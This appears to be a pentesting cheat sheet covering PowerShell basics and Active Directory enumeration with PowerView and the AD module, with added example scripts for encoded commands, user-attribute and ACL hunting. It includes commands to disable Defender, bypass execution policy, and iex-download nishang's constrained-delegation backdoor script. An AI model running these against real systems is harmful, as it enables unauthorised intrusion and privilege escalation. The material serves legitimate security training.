PowerShell Beginner

PowerShell help system:

List every help topic whose name contains the word "process":

PS C:\Users\victim6\Downloads\new\new> get-help *process*

List the conceptual "about_" topics (execution policies, signing, remoting and so on):

PS C:\Users\victim6\Downloads\new\new> get-help about_*

Show the PowerShell version (several of the cmdlets below need v3 or later):

PS C:\Users\victim6\Downloads\new\new> $psversiontable

Show the help for a single parameter of a cmdlet:

PS C:\Users\victim6\Downloads\new\new> get-help Get-Process -Parameter name

List every help topic:

PS C:\Users\victim6\Downloads\new\new> get-help *

Update the help system (v3+; needs an elevated prompt and Internet access, because the help content is downloaded from Microsoft):

PS C:\Users\victim6\Downloads\new\new> update-help

Show the full help for a cmdlet:

PS C:\Users\victim6\Downloads\new\new> get-help get-item

List examples of how to run a cmdlet:

PS C:\Users\victim6\Downloads\new\new> get-help get-item -Examples

PowerShell cmdlets and aliases:

Resolve an alias to the cmdlet behind it (dir is Get-ChildItem):

PS C:\Users\victim6\Downloads\new\new> Get-Alias -Name dir

List every alias that points at a given cmdlet:

PS C:\Users\victim6\Downloads\new\new> Get-Alias -Definition Get-ChildItem

Use the command below to list all cmdlets:

PS C:\Users\victim6\Downloads\new\new> Get-Command -CommandType cmdlet

Many cmdlets are interesting from a pentester's perspective. Count them, then search by name or by verb:

PS C:\Users\victim6\Downloads\new\new> Get-Command -CommandType Cmdlet | Measure-Object

PS C:\Users\victim6\Downloads\new\new> Get-Command -name *process*

PS C:\Users\victim6\Downloads\new\new> Get-Command -Verb set

Disable Windows Defender real-time monitoring (this is Defender, not the Windows Firewall; it needs an elevated prompt, and Tamper Protection blocks it on current Windows builds):

PS C:\Users\victim6\Downloads\new\new> Set-MpPreference -DisableRealtimeMonitoring $true

PowerShell scripts: execution policy:

Check the current execution policy (a preference that stops scripts being run by accident, not a security boundary; Microsoft's own documentation says so):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> Get-ExecutionPolicy

Use the command below to start a child PowerShell with the policy set to Bypass for that process only (nothing on disk changes; the machine and user policies still read as before):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> powershell -ep bypass

Import a script as a module, for example PowerUpSQL from NetSPI:

https://github.com/NetSPI/PowerUpSQL.git

PS C:\Users\victim6\Downloads\PowerUpSQL-master\PowerUpSQL-master> Import-Module .\PowerUpSQL.ps1 -Verbose

List the modules installed on the box (everything under $env:PSModulePath):

PS C:\Users\victim6\Downloads\PowerUpSQL-master\PowerUpSQL-master> Get-Module -ListAvailable

List the commands a loaded module exports:

PS C:\Users\victim6\Downloads\PowerUpSQL-master\PowerUpSQL-master> Get-Command -Module PowerUpSQL

Download-and-execute cradle:

Fetches the script into memory and runs it with iex, so nothing touches disk. Use the raw file URL: the GitHub "blob" page returns HTML, which iex cannot run. On PowerShell 5 and later the DownloadString + iex pattern is recorded by script block logging (event 4104) and scanned by AMSI.

PS C:\Users\victim6> iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1')
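The cradle above executes whatever the server happens to return. As an added example, which is not from the original page or from nishang, the function below downloads the script as bytes, checks its SHA-256 against a hash pinned beforehand (taken with Get-FileHash from a reviewed offline copy), and only then compiles it into a script block for the caller to dot-source; a swapped or tampered file on the hosting side is refused instead of run. The hash in the usage line is a placeholder. This changes nothing about detection: AMSI and 4104 logging still see the content when the script block is created.

```powershell
# Added example: download cradle that pins the SHA-256 of the script before it can run.
function Get-PinnedScriptBlock {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$Sha256   # 64 hex chars, e.g. (Get-FileHash .\copy.ps1).Hash
    )
    # Fetch bytes rather than a string so the hash covers exactly what was served
    $wc    = New-Object Net.WebClient
    $wc.Headers.Add('User-Agent', 'Mozilla/5.0')   # some hosts refuse the default WebClient UA
    $bytes = $wc.DownloadData($Url)

    $sha    = [Security.Cryptography.SHA256]::Create()
    $actual = [BitConverter]::ToString($sha.ComputeHash($bytes)).Replace('-', '')
    if ($actual -ne $Sha256) {                      # -ne is case-insensitive in PowerShell
        throw "Refusing $Url : SHA-256 $actual does not match the pinned value $Sha256"
    }

    # raw.githubusercontent.com serves UTF-8; drop a BOM if the author saved one
    $script = [Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
    # Compiling the script block is the point where AMSI and script block logging see it
    [ScriptBlock]::Create($script)
}

# Usage (placeholder hash; take the real one from a reviewed offline copy).
# Dot-sourcing at the prompt puts the functions the script defines into the session,
# which is what iex gives you; dot-sourcing inside the function would lose them on return.
# . (Get-PinnedScriptBlock -Url 'https://raw.githubusercontent.com/samratashok/nishang/master/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1' -Sha256 '<sha256 of the reviewed copy>')
```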

Encoded command:

powershell.exe -EncodedCommand takes a script as the Base64 of its UTF-16LE bytes, which sidesteps quoting problems on the command line (powershell.exe lists the switch in its own command-line help). Invoke-CradleCrafter generates obfuscated variants of the download cradle above:

https://github.com/danielbohannon/Invoke-CradleCrafter

PS C:\Users\victim6\Downloads\Invoke-CradleCrafter-master\Invoke-CradleCrafter-master> help powershell
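As an added example that is not from the page or from Invoke-CradleCrafter, the block below produces the argument powershell.exe expects for -EncodedCommand and decodes one back again. The one-liner being wrapped is a constructed sample. Encoding is a transport convenience, not concealment: event 4688 records the full command line including the blob and event 4104 records the decoded script block, so the decode function is exactly what a responder runs on a logged blob.

```powershell
# Added example: build and decode a powershell.exe -EncodedCommand payload.
# powershell.exe requires UTF-16LE ("Unicode") bytes under the Base64; a blob made from
# UTF-8 bytes decodes to garbage and the child process reports a parse error.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Constructed sample payload; in practice this is the download cradle from above
$cmd = 'Get-Process | Select-Object -First 3 Name, Id'

$enc = ConvertTo-EncodedCommand -Script $cmd
"powershell.exe -NoProfile -NonInteractive -EncodedCommand $enc"

# Run it: the child process decodes the blob and executes the script
powershell.exe -NoProfile -NonInteractive -EncodedCommand $enc

# Responder's side: a blob lifted from a 4688 event decodes straight back to the plaintext
$plain = ConvertFrom-EncodedCommand -Base64 $enc
if ($plain -ne $cmd) { throw 'round-trip mismatch' }
$plain
```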

PowerShell and Active Directory:

Domain enumeration:

Local administrators on the current host (a local check rather than domain enumeration, but the usual first step):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> net localgroup administrators

Load the Microsoft ActiveDirectory module without installing RSAT, using the ADModule repository: the DLL is copied from a host that has RSAT and is loaded on any domain-joined machine.

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Import-ActiveDirectory.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> help Import-ActiveDirectory -Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-ActiveDirectory -DllPath .\Microsoft.ActiveDirectory.Management.dll -ADModulePath .\ActiveDirectory\ActiveDirectory.psd1 -Verbose

Get the current domain (PowerView):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetDomain -Domain security.local

Get the domain SID with the Active Directory module (.value returns the plain string):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> (Get-ADDomain).domainsid

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> (Get-ADDomain).domainsid.value

Get the domain controllers (PowerView, then the Active Directory module):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetDomainController

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADDomainController

Get all users of the domain (PowerView):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetUser

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> get-netuser | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> get-netuser -Domain security.local | select name

Using the Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter *

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter * -Properties *

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter * -Properties * | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Identity victim6
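Dumping every property of every user, as above, is rarely the goal; the useful step is filtering it. As an added example that is not from the page, PowerView or the AD module's own docs, the function below uses the Active Directory module with LDAP filters so the domain controller returns only enabled accounts that carry one of the attributes a pentester reads first. It assumes the ActiveDirectory module is loaded (RSAT, or the ADModule DLL from above) and generalises the single Get-ADUser -Filter * call into several checks.

```powershell
# Added example: server-side filtering for the user attributes worth reading first.
# Assumes the ActiveDirectory module is loaded (RSAT, or the ADModule DLL from above).
Import-Module ActiveDirectory

# LDAP_MATCHING_RULE_BIT_AND lets a filter test single userAccountControl bits
$bitAnd = 'userAccountControl:1.2.840.113556.1.4.803:='

$checks = [ordered]@{
    PasswordNotRequired   = "($($bitAnd)32)"        # PASSWD_NOTREQD
    NoKerberosPreauth     = "($($bitAnd)4194304)"   # DONT_REQ_PREAUTH
    PasswordNeverExpires  = "($($bitAnd)65536)"     # DONT_EXPIRE_PASSWORD
    AdminCountSet         = '(adminCount=1)'        # is or was protected by AdminSDHolder
    HasSPN                = '(servicePrincipalName=*)'
    PasswordInDescription = '(|(description=*pass*)(description=*pwd*))'
}

function Get-InterestingADUser {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)
    foreach ($finding in $checks.Keys) {
        # objectCategory=person + objectClass=user narrows to real user accounts;
        # the negated bit 2 (ACCOUNTDISABLE) drops disabled ones
        $ldap = "(&(objectCategory=person)(objectClass=user)(!($($bitAnd)2))$($checks[$finding]))"
        Get-ADUser -LDAPFilter $ldap -SearchBase $SearchBase -Properties description, adminCount, servicePrincipalName, lastLogonDate, pwdLastSet |
            ForEach-Object {
                [PSCustomObject]@{
                    Finding        = $finding
                    SamAccountName = $_.SamAccountName
                    Description    = $_.Description
                    SPNs           = ($_.ServicePrincipalName -join ';')
                    LastLogon      = $_.LastLogonDate
                    PwdLastSet     = [DateTime]::FromFileTime($_.pwdLastSet)
                }
            }
    }
}

Get-InterestingADUser | Sort-Object Finding, SamAccountName | Format-Table -AutoSize
```

Each check is one LDAP query answered by the DC, so the whole run is a handful of searches instead of pulling every attribute of every account to the client and filtering locally.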

Get all the groups in the current domain:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetGroup

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetGroup *admin*

Using the Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADGroup -filter * | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADGroup -Filter 'name -like "*admin*"' | select name

Get all the members of the domain admins group:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetGroupMember -GroupName "domain admins"

Using the Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADGroupMember -Identity "domain admins" -Recursive

Get the group membership for a user:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetGroup -UserName "victim"

Using the Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADPrincipalGroupMembership -Identity administrator

Get all computers of the domain (PowerView):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetComputer

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetComputer -FullData

Using the Active Directory module (Get-ADComputer; the group query does not list computers):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADComputer -Filter * | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADComputer -Filter * -Properties *

Find all machines in the current domain where the current user has local admin access (PowerView; it tries every computer object in turn, so it is slow and noisy):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Find-LocalAdminAccess -Verbose

Find local admins on all machines of the domain:

List sessions on a particular computer:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetSession -ComputerName WIN-2RUMVG5JPOC

Find computers where a domain admin is logged in and the current user has local admin access:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Invoke-UserHunter -CheckAccess

Domain enumeration: ACLs:

Get the ACL of the specified object (PowerView; -ResolveGUIDs turns the ObjectType GUIDs into property and extended-right names):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ObjectAcl -SamAccountName administrator -ResolveGUIDs

Get the ACLs of the objects under the specified ADS prefix (relative to the domain root):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ObjectAcl -ADSprefix 'CN=administrator,CN=Users' -Verbose

ACLs can also be enumerated with the Active Directory module through its AD: drive (created when the module loads), but the ObjectType GUIDs are not resolved to names:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> (Get-Acl 'AD:\CN=administrator,CN=Users,DC=security,DC=local').Access

To look for interesting ACEs (modify rights such as GenericAll, WriteDacl or WriteOwner held by principals that are not the expected built-in admins):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Invoke-ACLScanner -ResolveGUIDs
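The two gaps in the AD-module route above are that Get-Acl does not resolve ObjectType GUIDs and that it has no equivalent of Invoke-ACLScanner. As an added example, which is not from the page, PowerView or Microsoft's module, the block below covers both with the Active Directory module alone: it builds a GUID-to-name map from the schema and the Extended-Rights container, then walks the objects under a search base and reports Allow ACEs that grant modify rights to domain principals with a RID of 1000 or more (PowerView's own heuristic for "not a built-in account"). It assumes the ActiveDirectory module is loaded so the AD: drive exists; the function name and the Users-container starting point are choices made for the example.

```powershell
# Added example: ACL scan with the ActiveDirectory module only, with GUID resolution.
# Assumes the module is loaded (RSAT, or the ADModule DLL from above) so the AD: drive exists.
Import-Module ActiveDirectory

# GUID -> name map from the schema (attributes and classes) and from Extended-Rights
# (control access rights); this is the step the AD: drive does not do for you.
$rootDse = Get-ADRootDSE
$guidMap = @{}
Get-ADObject -SearchBase $rootDse.schemaNamingContext -LDAPFilter '(schemaIDGUID=*)' -Properties name, schemaIDGUID |
    ForEach-Object { $guidMap[([guid]$_.schemaIDGUID).ToString()] = $_.name }
Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" -LDAPFilter '(objectClass=controlAccessRight)' -Properties name, rightsGuid |
    ForEach-Object { $guidMap[([guid]$_.rightsGuid).ToString()] = $_.name }

function Find-InterestingAce {
    param(
        [string]$SearchBase = (Get-ADDomain).DistinguishedName,
        # Rights that let the trustee take over or modify the object
        [string]$Rights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'
    )
    Get-ADObject -SearchBase $SearchBase -SearchScope Subtree -LDAPFilter '(objectClass=*)' |
      ForEach-Object {
        $dn  = $_.DistinguishedName
        $acl = Get-Acl -Path "AD:\$dn" -ErrorAction SilentlyContinue
        if (-not $acl) { return }          # DNs containing '/' need escaping; skipped here
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ("$($ace.ActiveDirectoryRights)" -notmatch $Rights) { continue }
            $sid = $null
            try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value } catch { }
            # Keep domain principals with RID >= 1000; this drops SYSTEM, Domain Admins,
            # Everyone and the other expected holders of these rights
            if ($sid -notmatch '^S-1-5-21-.*-[1-9]\d{3,}$') { continue }
            $guid = $ace.ObjectType.ToString()
            if ($ace.ObjectType -eq [guid]::Empty) { $typeName = 'All' }       # every property/right
            elseif ($guidMap.ContainsKey($guid)) { $typeName = $guidMap[$guid] }
            else { $typeName = $guid }
            [PSCustomObject]@{
                ObjectDN   = $dn
                Trustee    = $ace.IdentityReference.Value
                Rights     = $ace.ActiveDirectoryRights
                ObjectType = $typeName
                Inherited  = $ace.IsInherited
            }
        }
      }
}

# Start with the Users container; a whole-domain scan is slow and very visible in DC logs.
Find-InterestingAce -SearchBase "CN=Users,$((Get-ADDomain).DistinguishedName)" | Format-Table -AutoSize
```

A WriteProperty hit is only meaningful together with its ObjectType: "All" or a sensitive attribute such as member or servicePrincipalName is a finding, a single harmless attribute usually is not, which is why the GUID resolution is worth the two extra queries.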

Domain enumeration: trusts:

Get a list of all domain trusts for the current domain:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetDomainTrust

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetDomainTrust -Domain security.local

Using the Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADTrust -Filter *

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADTrust -Identity ujjtest.security.local

Get details about the current forest:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForest

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForest -Forest security.local

Using the Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADForest

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADForest -Identity security.local

Get all domains in the current forest:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForestDomain

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForestDomain -Forest security.local

Using the Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> (Get-ADForest).domains

Get trusts in the forest:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForestTrust

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForestTrust -Forest security.local

Using the Active Directory module (only forest trusts populate msDS-TrustForestTrustInfo, so filter on that attribute):

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

@Saksham Dixit